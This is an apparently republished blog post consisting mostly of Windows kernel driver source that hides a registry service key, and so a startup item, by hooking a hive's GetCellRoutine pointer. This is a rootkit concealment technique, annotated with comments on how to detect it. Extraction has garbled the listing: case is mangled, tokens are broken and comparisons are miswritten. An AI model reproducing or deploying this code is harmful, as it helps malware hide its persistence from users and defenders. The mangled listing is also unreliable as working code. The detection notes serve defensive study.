Icesword 1.22, registry hidden, startup item hidden

Source: Internet
Author: User
Run the latest icesword1.22 driver code to hide the registry key. In the past, the driver was written in icesword, but it was not disclosed in the end. At that time, rogue software was gaining momentum, so I didn't want to add fuel to the fire. Now the anti-rogue software is becoming increasingly mature, so it doesn't matter. Knowing the Principles makes defense very easy. The principle is very simple, and the implementation code is very short. You can directly look at the sample code. # Include <ntddk. h> # define get_ptr (PTR, offset) (* (pvoid *) (ulong) PTR + (offset # offset) # define cm_key_index_root 0x6972 // IR
# Define cm_key_index_leaf 0x696c // Il
# Define cm_key_fast_leaf 0x666c // fl
# Define cm_key_hash_leaf 0x686c // HL // some cm data structures, only the first part used
# Pragma pack (1)
// Partial, hand-declared mirrors of the kernel configuration-manager (Cm)
// structures this listing touches. Only the leading fields are declared (the
// "//..." markers are where the real structures continue); every access below
// is to one of these leading fields. NOTE(review): the listing has been
// reflowed and case-mangled by extraction (e.g. "typestrudef CT _ hhive"), so
// it is not compilable as printed and spellings do not match the DDK headers.
Typedef struct _ cm_key_node {
Ushort signature;
Ushort flags;
Large_integer lastwritetime;
Ulong spare; // used to be titleindex; not read here
Handle parent; // cell of the parent key node; resolved in getlastkeynode
Ulong subkeycounts [2]; // [0] stable, [1] volatile. Never adjusted anywhere in this listing, so a parent keeps reporting its full count while one subkey is suppressed - the observable inconsistency a checker can look for
Handle subkeylists [2]; // [0] stable, [1] volatile; only the stable list is walked below
//...
} Cm_key_node, * pcm_key_node; typedef struct _ cm_key_index {
// Subkey index cell. With a root signature the list holds further index cells;
// with a leaf signature it holds key-node cells (fast/hash leaves use two list
// slots per entry, which is why getlastkeynode indexes with 2*(count-1)).
Ushort signature; // one of the cm_key_index_* / cm_key_*_leaf tags defined above
Ushort count;
Handle list [1]; // variable length, declared with one slot
} Cm_key_index, * pcm_key_index; typedef struct _ cm_key_body {
// Object body behind a registry key handle; only keycontrolblock is read here.
Ulong type; // "ky02"
Pvoid keycontrolblock;
Pvoid policyblock;
Peprocess process; // The owner Process
List_entry keybodylist; // key_nodes using the same KCB
} Cm_key_body, * pcm_key_body; typedef pvoid (_ stdcall * pget_cell_routine) (pvoid, handle); typestrudef CT _ hhive {
// Per-hive header. getcellroutine is the cell-lookup function pointer that
// DriverEntry overwrites and driverunload restores. A loaded hive whose
// getcellroutine no longer points into the kernel image has been hooked this
// way; checking that pointer for every hive is the direct detection.
Ulong signature;
Pget_cell_routine getcellroutine;
//...
} Hhive, * phhive;
# Pragma pack () // name of the primary key to be hidden
// Full registry path of the key to hide: a service key under Services, which
// is what the title means by hiding a "startup item". NOTE(review): the
// separators print as "//", which looks like extraction garbling of the path
// string; it is runtime data and is left as printed.
// g_pgetcellroutine: the hive's original getcellroutine, saved by DriverEntry
// and called by the hook. g_ppgetcellroutine: address of that field in the
// hive header, kept so driverunload can write the original pointer back.
Wchar g_hidekeyname [] = l "// registry // machine // system // CurrentControlSet // services // beep"; pget_cell_routine g_pgetcellroutine = NULL;
// g_hidenode: key node (cell) of the key to hide, resolved once in DriverEntry.
Pget_cell_routine * g_ppgetcellroutine = NULL; pcm_key_node g_hidenode = NULL;
// g_lastnode: the parent's last subkey node that mygetcellroutine hands out in
// place of g_hidenode; set on that substitution and cleared once the same
// node is later requested (that request gets NULL).
Pcm_key_node g_lastnode = NULL; // open the key with the specified name
// Open the registry key named by pwcskeyname (a full \Registry-style object
// path) for KEY_READ as a kernel handle. Returns the handle, or NULL when
// zwopenkey fails (the failing status is printed first). The caller owns the
// handle; DriverEntry closes it with zwclose.
Handle openkeybyname (pcwstr pwcskeyname)
{
Ntstatus status;
Unicode_string ukeyname;
Object_attributes OA;
Handle hkey; rtlinitunicodestring (& ukeyname, pwcskeyname );
// Case-insensitive, kernel handle (not visible in the caller's handle table)
Initializeobjectattributes (& OA, & ukeyname, obj_case_insensitive | obj_kernel_handle, null, null );
Status = zwopenkey (& hkey, key_read, & OA );
If (! Nt_success (Status ))
{
Dbuplint ("zwopenkey failed: % LX/N", status ); // NOTE(review): "Dbuplint" reads as a garbled debug-print call throughout this listing
Return NULL;
} Return hkey;
} // Obtain the keycontrolblock of the specified key handle
// Return the keycontrolblock (KCB) pointer stored in the key object behind
// hkey, or NULL when hkey is NULL or the handle cannot be referenced (status
// printed). The key object is referenced only long enough to read the field
// and is dereferenced before returning, so the returned pointer carries no
// reference of its own.
Pvoid getkeycontrolblock (handle hkey)
{
Ntstatus status;
Pcm_key_body keybody;
Pvoid KCB; If (hkey = NULL) return NULL; // get the object body by the key handle (NOTE(review): "=" here is extraction garbling of a comparison)
Status = obreferenceobjectbyhandle (hkey, key_read, null, kernelmode, & keybody, null );
If (! Nt_success (Status ))
{
Dbuplint ("obreferenceobjectbyhandle failed: % LX/N", status );
Return NULL;
} // The object body contains keycontrolblock
KCB = keybody-> keycontrolblock;
// Drop the object reference taken above before returning the raw pointer
Dbuplint ("keycontrolblock = % LX/N", KCB); obdereferenceobject (keybody); Return KCB;
} // Get the node of the last child key of the parent key
// Given a key node, return the key node of the LAST subkey of its parent:
// parent node -> stable subkey index -> (root index: last sub-index) -> last
// leaf entry, each step resolved through the saved original cell routine.
// The hook uses the result as a stand-in for the hidden node. Nothing here
// touches parentnode->subkeycounts, so the parent's stored count and what a
// walk of its subkeys yields should disagree while the hook is active.
Pvoid getlastkeynode (pvoid hive, pcm_key_node node)
{
// Obtain the node of the parent key
Pcm_key_node parentnode = (pcm_key_node) g_pgetcellroutine (hive, node-> parent );
// Obtain the parent's stable subkey index ([0] = stable list)
Pcm_key_index Index = (pcm_key_index) g_pgetcellroutine (hive, parentnode-> subkeylists [0]); dbuplint ("parentnode = % LX/nindex = % LX/N", parentnode, index ); // if it is a root (secondary) index, descend into its last sub-index
If (index-> Signature = cm_key_index_root)
{
Index = (pcm_key_index) g_pgetcellroutine (hive, index-> list [index-> count-1]);
Dbuplint ("Index = % LX/N", index );
} If (index-> Signature = cm_key_fast_leaf | index-> Signature = cm_key_hash_leaf)
{
// Fast leaf (2k) / hash leaf (XP/2K3): entries take two list slots, hence 2*(count-1) for the last node
Return g_pgetcellroutine (hive, index-> list [2 * (index-> count-1)]);
}
Else
{
// General leaf index: one slot per entry, return the last node
Return g_pgetcellroutine (hive, index-> list [index-> count-1]);
}
} // Hook function of the getcell routine
// Replacement installed in hive->getcellroutine. Every cell lookup on the
// hooked hive is forwarded to the original routine; only the returned pointer
// is altered, and only for two cells: the hidden key node (the parent's last
// subkey node is returned instead and remembered in g_lastnode) and that
// remembered node (NULL is returned once, then g_lastnode is cleared). The
// hive is never written, so an offline parse of the hive file, or the same
// system booted without this driver, still shows the key.
Pvoid mygetcellroutine (pvoid hive, handle cell)
{
// Call the original function
Pvoid pret = g_pgetcellroutine (hive, cell );
If (pret)
{
// The node to be hidden is returned.
If (pret = g_hidenode)
{
Dbuplint ("getcellroutine (% lx, % 08lx) = % LX/N", hive, cell, Pret );
// Look up, remember, and return the last child key node of its parent key
Pret = g_lastnode = (pcm_key_node) getlastkeynode (hive, g_hidenode );
Dbuplint ("g_lastnode = % LX/N", g_lastnode );
// If the hidden node is itself the parent's last subkey there is no stand-in: return NULL
If (pret = g_hidenode) Pret = NULL;
}
// The remembered stand-in node is now requested on its own
Else if (pret = g_lastnode)
{
Dbuplint ("getcellroutine (% lx, % 08lx) = % LX/N", hive, cell, Pret );
// Forget it and return NULL this one time; later lookups pass through unchanged
Pret = g_lastnode = NULL;
}
}
Return pret;
} Ntstatus driverunload (pdriver_object pdrvobj)
{
// Unload routine (signature on the previous line): put the hive's original
// getcellroutine back. g_ppgetcellroutine is non-NULL only if DriverEntry
// installed the hook, so an unload after a failed key open is a no-op.
Dbuplint ("driverunload ()/n ");
// Release the hook
If (g_ppgetcellroutine) * g_ppgetcellroutine = g_pgetcellroutine;
Return STATUS_SUCCESS;
} Ntstatus DriverEntry (pdriver_object pdrvobj, punicode_string pregpath)
{
// Driver entry (signature on the previous line). Picks KCB field offsets for
// the running build, opens the key named by g_hidekeyname, reads its hive and
// cell through the KCB, saves the hive's getcellroutine and replaces it with
// mygetcellroutine. Returns status_not_supported on an unrecognised build;
// otherwise STATUS_SUCCESS even when the key could not be opened (the hook is
// then simply not installed). Aside from the loaded driver itself, the only
// change made is the overwritten function pointer in that hive's header; no
// registry data is modified.
Ulong buildnumber;
Ulong keyhiveoffset; // keycontrolblock-> keyhive
Ulong keycelloffset; // keycontrolblock-> keycell
Handle hkey;
Pvoid KCB, hive; dbuplint ("DriverEntry ()/n"); pdrvobj-> driverunload = driverunload; // query buildnumber
If (psgetversion (null, null, & buildnumber, null) return status_not_supported;
Dbuplint ("buildnumber = % d/N", buildnumber); // different versions of the keycontrolblock Structure
// The cell value is generally less than 0x80000000, while hive is the opposite. This can also be determined.
// Offsets are hard-coded per build; the driver refuses to load on any other build rather than guess.
Switch (buildnumber)
{
Case 2195: // win2000
Keyhiveoffset = 0xc;
Keycelloffset = 0x10;
Break;
Case 2600: // WINXP
Case 3790: // win2003
Keyhiveoffset = 0x10;
Keycelloffset = 0x14;
Break;
Default:
Return status_not_supported;
} // Open the key to be hidden
Hkey = openkeybyname (g_hidekeyname );
// Obtain the keycontrolblock of the key (NULL if the open failed; getkeycontrolblock tolerates a NULL handle)
KCB = getkeycontrolblock (hkey );
If (KCB)
{
// Obtain hive from KCB. NOTE(review): this Phhive `hive` shadows the Pvoid `hive` declared above, which is otherwise unused.
Phhive hive = (phhive) get_ptr (KCB, keyhive );
// Save both the hive's getcellroutine value and the address of the field (for restore on unload)
G_ppgetcellroutine = & hive-> getcellroutine;
G_pgetcellroutine = hive-> getcellroutine;
Dbuplint ("getcellroutine = % LX/N", g_pgetcellroutine );
// Resolve and save the key node to be hidden, via the original routine
G_hidenode = (pcm_key_node) g_pgetcellroutine (hive, get_ptr (KCB, keycell ));
// Hook the getcell routine
Hive-> getcellroutine = mygetcellroutine;
}
// NOTE(review): hkey is closed unconditionally and may be NULL when the open failed
Zwclose (hkey); return STATUS_SUCCESS;
}
